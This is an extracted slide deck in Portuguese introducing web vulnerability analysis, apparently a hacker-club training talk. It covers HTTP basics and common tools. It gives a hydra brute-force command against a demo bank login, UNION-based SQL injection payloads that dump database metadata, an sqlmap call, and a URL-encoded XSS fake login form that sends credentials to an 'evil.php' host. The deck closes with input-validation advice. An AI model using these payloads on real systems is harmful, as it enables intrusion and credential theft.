If you can't read please download the document
Upload
twisting-the-truth
View
274
Download
1
Embed Size (px)
Citation preview
1 Hack The Potat0
Introduo a Anlise de Vulnerabilidades Web
Organizao: Oeste Hacker Club OHChttp://oestehc.com.br/
Bruno dropped Criado{bruno|dropped}[at]tttruth.comhttp://tttruth.com
Sobre mim
Freelancer (Sec/Dev)
Entusiasta em Sec a mais de 15 anos
Profissional TI a mais de 10 anos (Infraestrutura/Redes/Desenvolvimento)
Membro fundador do OHC
Protocol HTTP/1.1 RFC 2616
curl -v http://www.pudim.com.br
nc www.pudim.com.br 80 GET / HTTP/1.1
nc oestehc.com.br 80GET / HTTP/1.1
Methods HTTP/1.1
GET
HEAD
POST
PUT
PATCH
OPTIONS
DELETE
TRACE
CONNECT
Status Code HTTP/1.1
1xx Information
2xx Successful
3xx Redirection
4xx Client Error
5xx Server Error
OWASP Top 10 2013
Erros mais comuns
Falta de Canonicalizao
Apenas verificaes Client-Side
Obscuridade
Tools
OWASP ZAP / Burp Suite
wfuzz / dirb / dirbuster
w3af / arachni / Vega
sqlmap
(x)hydra / brutus
HTTP Proxy
Quebra de Autenticao - (x)hydra
hydra -p naosei -L /usr/share/wordlists/wfuzz/general/common.txt www.testfire.net http-post-form /bank/login.aspx:uid=^USER^&passw=^PASS^&btnSubmit=Login:Please try again
SQL Injection
SQL Injection
Encontrar n de colunas
Qual coluna printa informaes
Obter informaes da tabela
SQL Injection
Encontrar n de colunas
id=1 UNION SELECT 1, 2, 3, , Xid=1 ORDER BY 5, 10, 15Qual coluna printa informaes
Obter informaes da tabela
SQL Injection
Encontrar n de colunas
Qual coluna printa informaes
id=1 UNION SELECT 1, 2, 3, 4, 5, @@version, 7 id=1 UNION SELECT 1, 2, 3, 4, 5, @@hostname, 7id=1 UNION SELECT 1, 2, 3, 4, 5, current_user(), 7id=1 UNION SELECT 1, 2, 3, 4, 5, database(), 7id=1 UNION SELECT 1, 2, 3, 4, 5, uuid(), 7Obter informaes da tabela
Obter informaes de outras tabelas/database
SQL Injection
Encontrar n de colunas
Qual coluna printa informaes
Obter informaes da tabela
id=1 UNION SELECT 1, 2, 3, c_name, 4, 5, from information_schema.columnsid=1 UNION SELECT 1, 2, 3, t_name, 4, 5, from information_schema.tables
SQL Injection - sqlmap
sqlmap -u http://www.site.com/page.php?id=2
Cross-Site Scripting (XSS)
Dear user please provide password Username:
Password:
%3Ch1%3EDear+user+please+provide+password+%3Ch1%3E%3Cdiv+background-color%3A%23FF3300%3E%3Cform+action%3D%E2%80%9Dhttp%3A%2F%2F127.0.0.1%2Fevil.php%E2%80%9D%3EUsername%3A%3Cbr%3E%3Cinput+type%3D%E2%80%9Dtext%E2%80%9D+name%3D%E2%80%9Duser%E2%80%9D%3E%3Cbr%3EPassword%3A%3Cbr%3E%3Cinput+type%3D%E2%80%9Dtext%E2%80%9D+name%3D%E2%80%9Dpass%E2%80%9D%3E%3Cbr%3E%3Cinput+type%3DSUBMIT+value%3D%22login%22+%2F%3E%3C%2Fform%3E%3C%2Fdiv%3E
Pense nisso!
Desconfie de dados externos
possvel forjar os dados
Sempre valide
Previna e trate os erros
Revise
Teste a segurana